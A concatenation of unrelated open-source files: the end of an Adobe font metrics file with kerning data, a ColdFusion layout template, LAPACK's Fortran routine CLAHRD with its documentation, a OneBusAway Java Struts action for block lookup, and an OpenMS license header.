C 174 ; WX 685 ; N fi ; B -70 -205 641 737 ;
C 175 ; WX 685 ; N fl ; B -70 -205 671 737 ;
C 177 ; WX 500 ; N endash ; B -47 189 479 287 ;
C 178 ; WX 500 ; N dagger ; B 48 -146 508 737 ;
C 179 ; WX 500 ; N daggerdbl ; B -60 -150 508 737 ;
C 180 ; WX 287 ; N periodcentered ; B 57 200 229 372 ;
C 182 ; WX 650 ; N paragraph ; B 25 -131 681 722 ;
C 183 ; WX 606 ; N bullet ; B 122 180 484 542 ;
C 184 ; WX 259 ; N quotesinglbase ; B -57 -192 170 157 ;
C 185 ; WX 481 ; N quotedblbase ; B -57 -192 412 157 ;
C 186 ; WX 481 ; N quotedblright ; B 43 388 510 737 ;
C 187 ; WX 481 ; N guillemotright ; B -31 69 453 407 ;
C 188 ; WX 1000 ; N ellipsis ; B 81 -15 919 157 ;
C 189 ; WX 1167 ; N perthousand ; B 20 -28 1147 727 ;
C 191 ; WX 481 ; N questiondown ; B 0 -205 372 547 ;
C 193 ; WX 333 ; N grave ; B 74 538 294 722 ;
C 194 ; WX 333 ; N acute ; B 123 538 372 722 ;
C 195 ; WX 333 ; N circumflex ; B 23 533 365 705 ;
C 196 ; WX 333 ; N tilde ; B 28 561 398 690 ;
C 197 ; WX 333 ; N macron ; B 47 573 404 649 ;
C 198 ; WX 333 ; N breve ; B 67 535 390 698 ;
C 199 ; WX 333 ; N dotaccent ; B 145 546 289 690 ;
C 200 ; WX 333 ; N dieresis ; B 33 546 393 690 ;
C 202 ; WX 333 ; N ring ; B 111 522 335 746 ;
C 203 ; WX 333 ; N cedilla ; B -21 -220 225 3 ;
C 205 ; WX 333 ; N hungarumlaut ; B 15 538 480 722 ;
C 206 ; WX 333 ; N ogonek ; B 68 -155 246 -10 ;
C 207 ; WX 333 ; N caron ; B 60 531 403 705 ;
C 208 ; WX 1000 ; N emdash ; B -47 189 979 287 ;
C 225 ; WX 889 ; N AE ; B -86 0 915 722 ;
C 227 ; WX 412 ; N ordfeminine ; B 47 407 460 705 ;
C 232 ; WX 704 ; N Lslash ; B -41 0 670 722 ;
C 233 ; WX 833 ; N Oslash ; B 35 -68 798 790 ;
C 234 ; WX 963 ; N OE ; B 29 0 989 722 ;
C 235 ; WX 356 ; N ordmasculine ; B 42 407 394 705 ;
C 241 ; WX 815 ; N ae ; B -18 -15 775 477 ;
C 245 ; WX 389 ; N dotlessi ; B 32 -15 345 477 ;
C 248 ; WX 389 ; N lslash ; B 5 -15 390 737 ;
C 249 ; WX 574 ; N oslash ; B 0 -121 530 583 ;
C 250 ; WX 852 ; N oe ; B -6 -15 812 477 ;
C 251 ; WX 574 ; N germandbls ; B -91 -205 540 737 ;
C -1 ; WX 519 ; N ecircumflex ; B 0 -15 479 705 ;
C -1 ; WX 519 ; N edieresis ; B 0 -15 486 690 ;
C -1 ; WX 667 ; N aacute ; B 6 -15 636 722 ;
C -1 ; WX 747 ; N registered ; B -2 -15 750 737 ;
C -1 ; WX 389 ; N icircumflex ; B 21 -15 363 698 ;
C -1 ; WX 685 ; N udieresis ; B 30 -15 635 690 ;
C -1 ; WX 574 ; N ograve ; B 0 -15 530 722 ;
C -1 ; WX 685 ; N uacute ; B 30 -15 635 722 ;
C -1 ; WX 685 ; N ucircumflex ; B 30 -15 635 705 ;
C -1 ; WX 741 ; N Aacute ; B -75 0 716 947 ;
C -1 ; WX 389 ; N igrave ; B 32 -15 345 715 ;
C -1 ; WX 444 ; N Icircumflex ; B -41 0 485 930 ;
C -1 ; WX 537 ; N ccedilla ; B 0 -220 482 477 ;
C -1 ; WX 667 ; N adieresis ; B 6 -15 636 690 ;
C -1 ; WX 741 ; N Ecircumflex ; B -41 0 730 930 ;
C -1 ; WX 481 ; N scaron ; B 0 -15 477 705 ;
C -1 ; WX 648 ; N thorn ; B -119 -205 590 737 ;
C -1 ; WX 950 ; N trademark ; B 42 317 1017 722 ;
C -1 ; WX 519 ; N egrave ; B 0 -15 479 722 ;
C -1 ; WX 344 ; N threesuperior ; B 3 273 361 705 ;
C -1 ; WX 519 ; N zcaron ; B -19 -15 473 695 ;
C -1 ; WX 667 ; N atilde ; B 6 -15 636 690 ;
C -1 ; WX 667 ; N aring ; B 6 -15 636 746 ;
C -1 ; WX 574 ; N ocircumflex ; B 0 -15 530 705 ;
C -1 ; WX 741 ; N Edieresis ; B -41 0 730 915 ;
C -1 ; WX 861 ; N threequarters ; B 35 -15 789 705 ;
C -1 ; WX 519 ; N ydieresis ; B -66 -205 493 690 ;
C -1 ; WX 519 ; N yacute ; B -66 -205 493 722 ;
C -1 ; WX 389 ; N iacute ; B 32 -15 370 715 ;
C -1 ; WX 741 ; N Acircumflex ; B -75 0 716 930 ;
C -1 ; WX 833 ; N Uacute ; B 88 -15 900 947 ;
C -1 ; WX 519 ; N eacute ; B 0 -15 479 722 ;
C -1 ; WX 833 ; N Ograve ; B 37 -15 796 947 ;
C -1 ; WX 667 ; N agrave ; B 6 -15 636 722 ;
C -1 ; WX 833 ; N Udieresis ; B 88 -15 900 915 ;
C -1 ; WX 667 ; N acircumflex ; B 6 -15 636 705 ;
C -1 ; WX 444 ; N Igrave ; B -41 0 485 947 ;
C -1 ; WX 344 ; N twosuperior ; B -17 280 362 705 ;
C -1 ; WX 833 ; N Ugrave ; B 88 -15 900 947 ;
C -1 ; WX 861 ; N onequarter ; B 17 -15 789 705 ;
C -1 ; WX 833 ; N Ucircumflex ; B 88 -15 900 930 ;
C -1 ; WX 685 ; N Scaron ; B 1 -15 666 930 ;
C -1 ; WX 444 ; N Idieresis ; B -41 0 509 915 ;
C -1 ; WX 389 ; N idieresis ; B 31 -15 391 683 ;
C -1 ; WX 741 ; N Egrave ; B -41 0 730 947 ;
C -1 ; WX 833 ; N Oacute ; B 37 -15 796 947 ;
C -1 ; WX 606 ; N divide ; B 50 -40 556 546 ;
C -1 ; WX 741 ; N Atilde ; B -75 0 716 915 ;
C -1 ; WX 741 ; N Aring ; B -75 0 716 991 ;
C -1 ; WX 833 ; N Odieresis ; B 37 -15 796 915 ;
C -1 ; WX 741 ; N Adieresis ; B -75 0 716 915 ;
C -1 ; WX 852 ; N Ntilde ; B -61 -10 913 915 ;
C -1 ; WX 704 ; N Zcaron ; B -33 0 711 930 ;
C -1 ; WX 741 ; N Thorn ; B -41 0 690 722 ;
C -1 ; WX 444 ; N Iacute ; B -41 0 488 947 ;
C -1 ; WX 606 ; N plusminus ; B 50 0 556 506 ;
C -1 ; WX 606 ; N multiply ; B 65 15 541 491 ;
C -1 ; WX 741 ; N Eacute ; B -41 0 730 947 ;
C -1 ; WX 704 ; N Ydieresis ; B 13 0 775 915 ;
C -1 ; WX 344 ; N onesuperior ; B 19 282 326 705 ;
C -1 ; WX 685 ; N ugrave ; B 30 -15 635 722 ;
C -1 ; WX 606 ; N logicalnot ; B 50 103 556 403 ;
C -1 ; WX 685 ; N ntilde ; B 0 -15 639 690 ;
C -1 ; WX 833 ; N Otilde ; B 37 -15 796 915 ;
C -1 ; WX 574 ; N otilde ; B 0 -15 530 690 ;
C -1 ; WX 759 ; N Ccedilla ; B 37 -220 759 737 ;
C -1 ; WX 741 ; N Agrave ; B -75 0 716 947 ;
C -1 ; WX 861 ; N onehalf ; B 17 -15 798 705 ;
C -1 ; WX 833 ; N Eth ; B -47 0 796 722 ;
C -1 ; WX 400 ; N degree ; B 86 419 372 705 ;
C -1 ; WX 704 ; N Yacute ; B 13 0 775 947 ;
C -1 ; WX 833 ; N Ocircumflex ; B 37 -15 796 930 ;
C -1 ; WX 574 ; N oacute ; B 0 -15 530 722 ;
C -1 ; WX 685 ; N mu ; B -89 -205 635 477 ;
C -1 ; WX 606 ; N minus ; B 50 199 556 307 ;
C -1 ; WX 574 ; N eth ; B 0 -15 530 752 ;
C -1 ; WX 574 ; N odieresis ; B 0 -15 530 690 ;
C -1 ; WX 747 ; N copyright ; B -2 -15 750 737 ;
C -1 ; WX 606 ; N brokenbar ; B 249 -175 357 675 ;
EndCharMetrics
StartKernData
StartKernPairs 239
KPX A y -33
KPX A w -25
KPX A v -10
KPX A u -15
KPX A quoteright -95
KPX A quotedblright -95
KPX A Y -70
KPX A W -84
KPX A V -100
KPX A U -32
KPX A T 5
KPX A Q 5
KPX A O 5
KPX A G 5
KPX A C 5
KPX B period 15
KPX B comma 15
KPX B U 15
KPX B A -11
KPX C A -5
KPX D period -11
KPX D comma -11
KPX D Y 6
KPX D W -11
KPX D V -18
KPX F r -27
KPX F period -91
KPX F o -47
KPX F i -41
KPX F e -41
KPX F comma -91
KPX F a -47
KPX F A -79
KPX J u -39
KPX J period -74
KPX J o -40
KPX J e -33
KPX J comma -74
KPX J a -40
KPX J A -30
KPX K y -48
KPX K u -4
KPX K o -4
KPX K e 18
KPX L y -30
KPX L quoteright -100
KPX L quotedblright -100
KPX L Y -55
KPX L W -69
KPX L V -97
KPX L T -75
KPX N period -49
KPX N comma -49
KPX O period -18
KPX O comma -18
KPX O X -18
KPX O W -15
KPX O V -24
KPX O A -5
KPX P period -100
KPX P o -40
KPX P e -33
KPX P comma -100
KPX P a -40
KPX P A -80
KPX R W -14
KPX R V -24
KPX S period -18
KPX S comma -18
KPX T y -30
KPX T w -30
KPX T u -22
KPX T r -9
KPX T period -55
KPX T o -40
KPX T i -22
KPX T hyphen -75
KPX T h -9
KPX T e -33
KPX T comma -55
KPX T a -40
KPX T O 11
KPX T A -60
KPX U period -25
KPX U comma -25
KPX U A -42
KPX V u -70
KPX V semicolon 6
KPX V period -94
KPX V o -71
KPX V i -35
KPX V hyphen -94
KPX V e -66
KPX V comma -94
KPX V colon -49
KPX V a -55
KPX V O -19
KPX V G -12
KPX V A -100
KPX W y -41
KPX W u -25
KPX W semicolon -22
KPX W period -86
KPX W o -33
KPX W i -27
KPX W hyphen -61
KPX W h 5
KPX W e -39
KPX W comma -86
KPX W colon -22
KPX W a -33
KPX W O -11
KPX W A -66
KPX Y u -58
KPX Y semicolon -55
KPX Y period -91
KPX Y o -77
KPX Y i -22
KPX Y hyphen -91
KPX Y e -71
KPX Y comma -91
KPX Y colon -55
KPX Y a -77
KPX Y A -79
KPX a y -8
KPX a w -8
KPX a v 6
KPX b y -6
KPX b v 8
KPX b period 6
KPX b comma 6
KPX c y -20
KPX c period -8
KPX c l -13
KPX c k -8
KPX c h -18
KPX c comma -8
KPX colon space -18
KPX comma space -18
KPX comma quoteright -18
KPX comma quotedblright -18
KPX d y -15
KPX d w -15
KPX e y -15
KPX e x -5
KPX e w -15
KPX e p -11
KPX e g -4
KPX e b -8
KPX f quoteright 105
KPX f quotedblright 105
KPX f period -28
KPX f o 7
KPX f l 7
KPX f i 7
KPX f e 14
KPX f dotlessi 7
KPX f comma -28
KPX f a 8
KPX g y -11
KPX g r 11
KPX g period -5
KPX g comma -5
KPX h y -20
KPX i v 7
KPX k y -15
KPX k o -22
KPX k e -16
KPX l y -7
KPX l w -7
KPX m y -20
KPX m u -11
KPX n y -20
KPX n v -7
KPX n u -11
KPX o y -11
KPX o w -8
KPX o v 6
KPX p y -4
KPX p period 8
KPX p comma 8
KPX period space -18
KPX period quoteright -18
KPX period quotedblright -18
KPX quotedblleft quoteleft 20
KPX quotedblleft A -60
KPX quotedblright space -18
KPX quoteleft A -80
KPX quoteright v -16
KPX quoteright t -22
KPX quoteright s -46
KPX quoteright r -9
KPX quoteright l -22
KPX quoteright d -41
KPX r y -20
KPX r v -7
KPX r u -11
KPX r t -11
KPX r semicolon 9
KPX r s -20
KPX r quoteright 9
KPX r period -90
KPX r p -17
KPX r o -11
KPX r l -14
KPX r k 9
KPX r i -14
KPX r hyphen -16
KPX r g -11
KPX r e -7
KPX r d -7
KPX r comma -90
KPX r colon 9
KPX r a -11
KPX s period 11
KPX s comma 11
KPX semicolon space -18
KPX space quotedblleft -18
KPX space Y -18
KPX space W -33
KPX space V -24
KPX space T -18
KPX space A -22
KPX v period -11
KPX v o -6
KPX v comma -11
KPX v a -6
KPX w period -17
KPX w o -14
KPX w e -8
KPX w comma -17
KPX w a -14
KPX x e 5
KPX y period -25
KPX y o 8
KPX y e 15
KPX y comma -25
KPX y a 8
KPX z e 4
EndKernPairs
EndKernData
StartComposites 56
CC Aacute 2 ; PCC A 0 0 ; PCC acute 259 225 ;
CC Acircumflex 2 ; PCC A 0 0 ; PCC circumflex 259 225 ;
CC Adieresis 2 ; PCC A 0 0 ; PCC dieresis 259 225 ;
CC Agrave 2 ; PCC A 0 0 ; PCC grave 259 225 ;
CC Aring 2 ; PCC A 0 0 ; PCC ring 229 245 ;
CC Atilde 2 ; PCC A 0 0 ; PCC tilde 259 225 ;
CC Eacute 2 ; PCC E 0 0 ; PCC acute 296 225 ;
CC Ecircumflex 2 ; PCC E 0 0 ; PCC circumflex 296 225 ;
CC Edieresis 2 ; PCC E 0 0 ; PCC dieresis 296 225 ;
CC Egrave 2 ; PCC E 0 0 ; PCC grave 296 225 ;
CC Iacute 2 ; PCC I 0 0 ; PCC acute 116 225 ;
CC Icircumflex 2 ; PCC I 0 0 ; PCC circumflex 116 225 ;
CC Idieresis 2 ; PCC I 0 0 ; PCC dieresis 116 225 ;
CC Igrave 2 ; PCC I 0 0 ; PCC grave 116 225 ;
CC Ntilde 2 ; PCC N 0 0 ; PCC tilde 326 225 ;
CC Oacute 2 ; PCC O 0 0 ; PCC acute 315 225 ;
CC Ocircumflex 2 ; PCC O 0 0 ; PCC circumflex 315 225 ;
CC Odieresis 2 ; PCC O 0 0 ; PCC dieresis 315 225 ;
CC Ograve 2 ; PCC O 0 0 ; PCC grave 315 225 ;
CC Otilde 2 ; PCC O 0 0 ; PCC tilde 315 225 ;
CC Scaron 2 ; PCC S 0 0 ; PCC caron 206 225 ;
CC Uacute 2 ; PCC U 0 0 ; PCC acute 340 225 ;
CC Ucircumflex 2 ; PCC U 0 0 ; PCC circumflex 340 225 ;
CC Udieresis 2 ; PCC U 0 0 ; PCC dieresis 340 225 ;
CC Ugrave 2 ; PCC U 0 0 ; PCC grave 340 225 ;
CC Yacute 2 ; PCC Y 0 0 ; PCC acute 246 225 ;
CC Ydieresis 2 ; PCC Y 0 0 ; PCC dieresis 236 225 ;
CC Zcaron 2 ; PCC Z 0 0 ; PCC caron 226 225 ;
CC aacute 2 ; PCC a 0 0 ; PCC acute 167 0 ;
CC acircumflex 2 ; PCC a 0 0 ; PCC circumflex 167 0 ;
CC adieresis 2 ; PCC a 0 0 ; PCC dieresis 167 0 ;
CC agrave 2 ; PCC a 0 0 ; PCC grave 167 0 ;
CC aring 2 ; PCC a 0 0 ; PCC ring 167 0 ;
CC atilde 2 ; PCC a 0 0 ; PCC tilde 167 0 ;
CC eacute 2 ; PCC e 0 0 ; PCC acute 93 0 ;
CC ecircumflex 2 ; PCC e 0 0 ; PCC circumflex 93 0 ;
CC edieresis 2 ; PCC e 0 0 ; PCC dieresis 93 0 ;
CC egrave 2 ; PCC e 0 0 ; PCC grave 93 0 ;
CC iacute 2 ; PCC dotlessi 0 0 ; PCC acute -2 -7 ;
CC icircumflex 2 ; PCC dotlessi 0 0 ; PCC circumflex -2 -7 ;
CC idieresis 2 ; PCC dotlessi 0 0 ; PCC dieresis -2 -7 ;
CC igrave 2 ; PCC dotlessi 0 0 ; PCC grave -2 -7 ;
CC ntilde 2 ; PCC n 0 0 ; PCC tilde 176 0 ;
CC oacute 2 ; PCC o 0 0 ; PCC acute 121 0 ;
CC ocircumflex 2 ; PCC o 0 0 ; PCC circumflex 121 0 ;
CC odieresis 2 ; PCC o 0 0 ; PCC dieresis 121 0 ;
CC ograve 2 ; PCC o 0 0 ; PCC grave 121 0 ;
CC otilde 2 ; PCC o 0 0 ; PCC tilde 121 0 ;
CC scaron 2 ; PCC s 0 0 ; PCC caron 74 0 ;
CC uacute 2 ; PCC u 0 0 ; PCC acute 176 0 ;
CC ucircumflex 2 ; PCC u 0 0 ; PCC circumflex 176 0 ;
CC udieresis 2 ; PCC u 0 0 ; PCC dieresis 176 0 ;
CC ugrave 2 ; PCC u 0 0 ; PCC grave 176 0 ;
CC yacute 2 ; PCC y 0 0 ; PCC acute 93 0 ;
CC ydieresis 2 ; PCC y 0 0 ; PCC dieresis 93 0 ;
CC zcaron 2 ; PCC z 0 0 ; PCC caron 63 -10 ;
EndComposites
EndFontMetrics
| {
"pile_set_name": "Github"
} |
<!--- Layout template: wraps the rendered view content -- returned by
      includeContent(), presumably the enclosing framework's content
      include (verify against the framework in use) -- between literal
      start/end markers.  The marker lines are emitted verbatim. --->
<cfoutput>
start:specificlayout
#includeContent()#
end:specificlayout
</cfoutput>
"pile_set_name": "Github"
} |
*> \brief \b CLAHRD reduces the first nb columns of a general rectangular matrix A so that elements below the k-th subdiagonal are zero, and returns auxiliary matrices which are needed to apply the transformation to the unreduced part of A.
*
* =========== DOCUMENTATION ===========
*
* Online html documentation available at
* http://www.netlib.org/lapack/explore-html/
*
*> \htmlonly
*> Download CLAHRD + dependencies
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.tgz?format=tgz&filename=/lapack/lapack_routine/clahrd.f">
*> [TGZ]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.zip?format=zip&filename=/lapack/lapack_routine/clahrd.f">
*> [ZIP]</a>
*> <a href="http://www.netlib.org/cgi-bin/netlibfiles.txt?format=txt&filename=/lapack/lapack_routine/clahrd.f">
*> [TXT]</a>
*> \endhtmlonly
*
* Definition:
* ===========
*
* SUBROUTINE CLAHRD( N, K, NB, A, LDA, TAU, T, LDT, Y, LDY )
*
* .. Scalar Arguments ..
* INTEGER K, LDA, LDT, LDY, N, NB
* ..
* .. Array Arguments ..
* COMPLEX A( LDA, * ), T( LDT, NB ), TAU( NB ),
* $ Y( LDY, NB )
* ..
*
*
*> \par Purpose:
* =============
*>
*> \verbatim
*>
*> This routine is deprecated and has been replaced by routine CLAHR2.
*>
*> CLAHRD reduces the first NB columns of a complex general n-by-(n-k+1)
*> matrix A so that elements below the k-th subdiagonal are zero. The
*> reduction is performed by a unitary similarity transformation
*> Q**H * A * Q. The routine returns the matrices V and T which determine
*> Q as a block reflector I - V*T*V**H, and also the matrix Y = A * V * T.
*> \endverbatim
*
* Arguments:
* ==========
*
*> \param[in] N
*> \verbatim
*> N is INTEGER
*> The order of the matrix A.
*> \endverbatim
*>
*> \param[in] K
*> \verbatim
*> K is INTEGER
*> The offset for the reduction. Elements below the k-th
*> subdiagonal in the first NB columns are reduced to zero.
*> \endverbatim
*>
*> \param[in] NB
*> \verbatim
*> NB is INTEGER
*> The number of columns to be reduced.
*> \endverbatim
*>
*> \param[in,out] A
*> \verbatim
*> A is COMPLEX array, dimension (LDA,N-K+1)
*> On entry, the n-by-(n-k+1) general matrix A.
*> On exit, the elements on and above the k-th subdiagonal in
*> the first NB columns are overwritten with the corresponding
*> elements of the reduced matrix; the elements below the k-th
*> subdiagonal, with the array TAU, represent the matrix Q as a
*> product of elementary reflectors. The other columns of A are
*> unchanged. See Further Details.
*> \endverbatim
*>
*> \param[in] LDA
*> \verbatim
*> LDA is INTEGER
*> The leading dimension of the array A. LDA >= max(1,N).
*> \endverbatim
*>
*> \param[out] TAU
*> \verbatim
*> TAU is COMPLEX array, dimension (NB)
*> The scalar factors of the elementary reflectors. See Further
*> Details.
*> \endverbatim
*>
*> \param[out] T
*> \verbatim
*> T is COMPLEX array, dimension (LDT,NB)
*> The upper triangular matrix T.
*> \endverbatim
*>
*> \param[in] LDT
*> \verbatim
*> LDT is INTEGER
*> The leading dimension of the array T. LDT >= NB.
*> \endverbatim
*>
*> \param[out] Y
*> \verbatim
*> Y is COMPLEX array, dimension (LDY,NB)
*> The n-by-nb matrix Y.
*> \endverbatim
*>
*> \param[in] LDY
*> \verbatim
*> LDY is INTEGER
*> The leading dimension of the array Y. LDY >= max(1,N).
*> \endverbatim
*
* Authors:
* ========
*
*> \author Univ. of Tennessee
*> \author Univ. of California Berkeley
*> \author Univ. of Colorado Denver
*> \author NAG Ltd.
*
*> \date December 2016
*
*> \ingroup complexOTHERauxiliary
*
*> \par Further Details:
* =====================
*>
*> \verbatim
*>
*> The matrix Q is represented as a product of nb elementary reflectors
*>
*> Q = H(1) H(2) . . . H(nb).
*>
*> Each H(i) has the form
*>
*> H(i) = I - tau * v * v**H
*>
*> where tau is a complex scalar, and v is a complex vector with
*> v(1:i+k-1) = 0, v(i+k) = 1; v(i+k+1:n) is stored on exit in
*> A(i+k+1:n,i), and tau in TAU(i).
*>
*> The elements of the vectors v together form the (n-k+1)-by-nb matrix
*> V which is needed, with T and Y, to apply the transformation to the
*> unreduced part of the matrix, using an update of the form:
*> A := (I - V*T*V**H) * (A - Y*V**H).
*>
*> The contents of A on exit are illustrated by the following example
*> with n = 7, k = 3 and nb = 2:
*>
*> ( a h a a a )
*> ( a h a a a )
*> ( a h a a a )
*> ( h h a a a )
*> ( v1 h a a a )
*> ( v1 v2 a a a )
*> ( v1 v2 a a a )
*>
*> where a denotes an element of the original matrix A, h denotes a
*> modified element of the upper Hessenberg matrix H, and vi denotes an
*> element of the vector defining H(i).
*> \endverbatim
*>
* =====================================================================
      SUBROUTINE CLAHRD( N, K, NB, A, LDA, TAU, T, LDT, Y, LDY )
*
*  -- LAPACK auxiliary routine (version 3.7.0) --
*  -- LAPACK is a software package provided by Univ. of Tennessee,    --
*  -- Univ. of California Berkeley, Univ. of Colorado Denver and NAG Ltd..--
*     December 2016
*
*     .. Scalar Arguments ..
      INTEGER            K, LDA, LDT, LDY, N, NB
*     ..
*     .. Array Arguments ..
      COMPLEX            A( LDA, * ), T( LDT, NB ), TAU( NB ),
     $                   Y( LDY, NB )
*     ..
*
*  =====================================================================
*
*     .. Parameters ..
      COMPLEX            ZERO, ONE
      PARAMETER          ( ZERO = ( 0.0E+0, 0.0E+0 ),
     $                   ONE = ( 1.0E+0, 0.0E+0 ) )
*     ..
*     .. Local Scalars ..
      INTEGER            I
*     EI carries the subdiagonal element that CLARFG overwrites with 1;
*     it is restored on the next iteration (and after the loop).
      COMPLEX            EI
*     ..
*     .. External Subroutines ..
      EXTERNAL           CAXPY, CCOPY, CGEMV, CLACGV, CLARFG, CSCAL,
     $                   CTRMV
*     ..
*     .. Intrinsic Functions ..
      INTRINSIC          MIN
*     ..
*     .. Executable Statements ..
*
*     Quick return if possible
*
      IF( N.LE.1 )
     $   RETURN
*
      DO 10 I = 1, NB
         IF( I.GT.1 ) THEN
*
*           Update A(1:n,i)
*
*           Compute i-th column of A - Y * V**H
*
            CALL CLACGV( I-1, A( K+I-1, 1 ), LDA )
            CALL CGEMV( 'No transpose', N, I-1, -ONE, Y, LDY,
     $                  A( K+I-1, 1 ), LDA, ONE, A( 1, I ), 1 )
            CALL CLACGV( I-1, A( K+I-1, 1 ), LDA )
*
*           Apply I - V * T**H * V**H to this column (call it b) from the
*           left, using the last column of T as workspace
*
*           Let  V = ( V1 )   and   b = ( b1 )   (first I-1 rows)
*                    ( V2 )             ( b2 )
*
*           where V1 is unit lower triangular
*
*           w := V1**H * b1
*
            CALL CCOPY( I-1, A( K+1, I ), 1, T( 1, NB ), 1 )
            CALL CTRMV( 'Lower', 'Conjugate transpose', 'Unit', I-1,
     $                  A( K+1, 1 ), LDA, T( 1, NB ), 1 )
*
*           w := w + V2**H *b2
*
            CALL CGEMV( 'Conjugate transpose', N-K-I+1, I-1, ONE,
     $                  A( K+I, 1 ), LDA, A( K+I, I ), 1, ONE,
     $                  T( 1, NB ), 1 )
*
*           w := T**H *w
*
            CALL CTRMV( 'Upper', 'Conjugate transpose', 'Non-unit', I-1,
     $                  T, LDT, T( 1, NB ), 1 )
*
*           b2 := b2 - V2*w
*
            CALL CGEMV( 'No transpose', N-K-I+1, I-1, -ONE, A( K+I, 1 ),
     $                  LDA, T( 1, NB ), 1, ONE, A( K+I, I ), 1 )
*
*           b1 := b1 - V1*w
*
            CALL CTRMV( 'Lower', 'No transpose', 'Unit', I-1,
     $                  A( K+1, 1 ), LDA, T( 1, NB ), 1 )
            CALL CAXPY( I-1, -ONE, T( 1, NB ), 1, A( K+1, I ), 1 )
*
*           Restore the subdiagonal element saved in EI on the previous
*           pass through the loop (CLARFG replaced it with 1 below).
            A( K+I-1, I-1 ) = EI
         END IF
*
*        Generate the elementary reflector H(i) to annihilate
*        A(k+i+1:n,i)
*
         EI = A( K+I, I )
         CALL CLARFG( N-K-I+1, EI, A( MIN( K+I+1, N ), I ), 1,
     $                TAU( I ) )
         A( K+I, I ) = ONE
*
*        Compute  Y(1:n,i)
*
         CALL CGEMV( 'No transpose', N, N-K-I+1, ONE, A( 1, I+1 ), LDA,
     $               A( K+I, I ), 1, ZERO, Y( 1, I ), 1 )
         CALL CGEMV( 'Conjugate transpose', N-K-I+1, I-1, ONE,
     $               A( K+I, 1 ), LDA, A( K+I, I ), 1, ZERO, T( 1, I ),
     $               1 )
         CALL CGEMV( 'No transpose', N, I-1, -ONE, Y, LDY, T( 1, I ), 1,
     $               ONE, Y( 1, I ), 1 )
         CALL CSCAL( N, TAU( I ), Y( 1, I ), 1 )
*
*        Compute T(1:i,i)
*
         CALL CSCAL( I-1, -TAU( I ), T( 1, I ), 1 )
         CALL CTRMV( 'Upper', 'No transpose', 'Non-unit', I-1, T, LDT,
     $               T( 1, I ), 1 )
         T( I, I ) = TAU( I )
*
   10 CONTINUE
*
*     Put back the last subdiagonal element saved in EI by the final
*     CLARFG call above.
      A( K+NB, NB ) = EI
*
      RETURN
*
*     End of CLAHRD
*
      END
| {
"pile_set_name": "Github"
} |
/**
* Copyright (C) 2011 Brian Ferris <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onebusaway.enterprise.webapp.actions.where;
import java.util.Date;
import java.util.TimeZone;
import org.apache.struts2.convention.annotation.Action;
import org.apache.struts2.convention.annotation.Actions;
import org.onebusaway.exceptions.ServiceException;
import org.onebusaway.transit_data.model.blocks.BlockConfigurationBean;
import org.onebusaway.transit_data.model.blocks.BlockInstanceBean;
import org.onebusaway.transit_data.services.TransitDataService;
import org.springframework.beans.factory.annotation.Autowired;
import com.opensymphony.xwork2.ActionSupport;
import com.opensymphony.xwork2.conversion.annotations.TypeConversion;
/**
 * Struts action that resolves and displays a block instance (the work run by
 * a single vehicle) for a given block id and service date.
 */
public class BlockAction extends ActionSupport {

  private static final long serialVersionUID = 1L;

  @Autowired
  private TransitDataService _service;

  // Request parameter: the block id to look up.
  private String _id;

  // Request parameter: the service date used to resolve the active
  // block configuration.
  private Date _serviceDate;

  // Result exposed to the view: the resolved block instance, if any.
  private BlockInstanceBean _blockInstance;

  // Result exposed to the view: time zone of the block configuration.
  private TimeZone _timeZone;

  public void setId(String id) {
    _id = id;
  }

  @TypeConversion(converter = "org.onebusaway.presentation.impl.conversion.DateConverter")
  public void setServiceDate(Date serviceDate) {
    _serviceDate = serviceDate;
  }

  public BlockInstanceBean getBlockInstance() {
    return _blockInstance;
  }

  public TimeZone getTimeZone() {
    return _timeZone;
  }

  @Override
  @Actions({
      @Action(value = "/where/block"),
      @Action(value = "/where/iphone/block")})
  public String execute() throws ServiceException {

    // Both the id and the service date are required to resolve a block
    // instance. Previously a missing service date fell through to
    // _serviceDate.getTime() and threw a NullPointerException; treat it
    // as incomplete input, consistent with the missing-id case.
    if (_id == null || _serviceDate == null)
      return INPUT;

    _blockInstance = _service.getBlockInstance(_id, _serviceDate.getTime());

    if (_blockInstance == null)
      return ERROR;

    BlockConfigurationBean blockConfig = _blockInstance.getBlockConfiguration();
    _timeZone = TimeZone.getTimeZone(blockConfig.getTimeZone());

    return SUCCESS;
  }
}
| {
"pile_set_name": "Github"
} |
// --------------------------------------------------------------------------
// OpenMS -- Open-Source Mass Spectrometry
// --------------------------------------------------------------------------
// Copyright The OpenMS Team -- Eberhard Karls University Tuebingen,
// ETH Zurich, and Freie Universitaet Berlin 2002-2020.
//
// This software is released under a three-clause BSD license:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of any author or any participating institution
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
// For a full list of authors, refer to the file AUTHORS.
// --------------------------------------------------------------------------
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL ANY OF THE AUTHORS OR THE CONTRIBUTING
// INSTITUTIONS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// --------------------------------------------------------------------------
